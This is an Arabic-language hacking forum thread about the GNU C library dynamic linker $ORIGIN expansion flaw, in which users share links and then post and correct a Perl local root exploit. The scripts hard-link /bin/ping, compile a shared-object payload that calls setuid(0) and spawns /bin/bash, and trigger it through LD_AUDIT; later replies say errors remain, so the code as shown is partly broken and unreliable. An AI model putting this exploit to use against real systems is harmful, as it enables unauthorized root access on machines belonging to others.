GNU C library dynamic linker $ORIGIN expansion Vulnerability

http://www.1337day.com/exploits/14513

http://www.youtube.com/watch?v=KNn2jAwahyQ

تمام يبرنس :slight_smile:

شرح روعة خويا ghost-dz يعطيك الصحة.

شكرا لكم على المرور RaYm0n - Sec4ever

شرح رائع والله

تسلم

2008 to old

تمام الله ينور عليك بس لو محت ممكن الكود فى المرفقات وياترى بتشتغل على انهو اصدارت وشكرا

بارك لله فيك على الشرح

شكرا لكم …

[b]مرسي حبيبي … على مشاركة معنا و شرح … :wink:
عملتها بيرل …

[/b]

#!/usr/bin/perl
# Writed by Lagripe-Dz :p

system('mkdir dz');
system('ln /bin/ping dz/target');
system('exec 3< dz/target');
system('rm -rf dz');
system('echo \'void __attribute__((constructor)) init() { setuid(0); system("/bin/bash"); }\' > payload.c');
system('gcc -w -fPIC -shared -o /tmp/exploit payload.c');
system('LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3');
print "# Every Thing Done !
";
system("id");
system("whoim");

[b]

سلام …
[/b]

r00t_ORIGIN.rar (379 Bytes)

فيه أخطاء طبعا لا يعمل بهدا الشكل
مشكور على المرور

ممكن توضح ؟ … مفهمتش !

هنا خطأ
gcc -w -fpic -shared -o /tmp/exploit payload.c
انت هنا ترجمت بايلود في tmp > exploit
يجب الترجمة في مكان انشاء المجلد وبنفس الاسم

التصحيح

#!/usr/bin/perl
# writed by lagripe-dz :p

system('mkdir /tmp/dz');
system('ln /bin/ping /tmp/dz/target');
system('exec 3< /tmp/dz/target');
system('rm -rf /tmp/dz');
system('echo \'void __attribute__((constructor))init()
{
setuid(0);
system("/bin/bash");
}\' > payload.c');
system('gcc -w -fpic -shared -o /tmp/dz payload.c');
system('LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3');
print "# every thing done !
";
system("id");
system("whoami")

أه صحا كنت تقول مع البدية :stuck_out_tongue: + صحا ياسين …

ميرسي قوست

نفس الي كنت رايح أطرحه بعد التصحيح في بعض أخطاء أوامر السيستم :stuck_out_tongue:

شكرا جاقو
انا عارفو مزال في أخطاء لكن متكلمتش
هنا
system(‘echo 'void attribute((constructor))init()
{
setuid(0);
system(“/bin/bash”);
}' > payload.c’);
تعويض انشاء ملف بسحبه من مكان اخر

عندك الحق ذوك جربت مخرجش ملف …

جرب في ميكروك هكا و ردلي … نورمالمون تصلح …

system('echo void __attribute__((constructor))init(){setuid(0);system("/bin/bash");} > payload.c');

لا مزال هناك خطأ
انا عندي الحل لكن أريد أن تحركو عقلكم قليلا أنت والبقية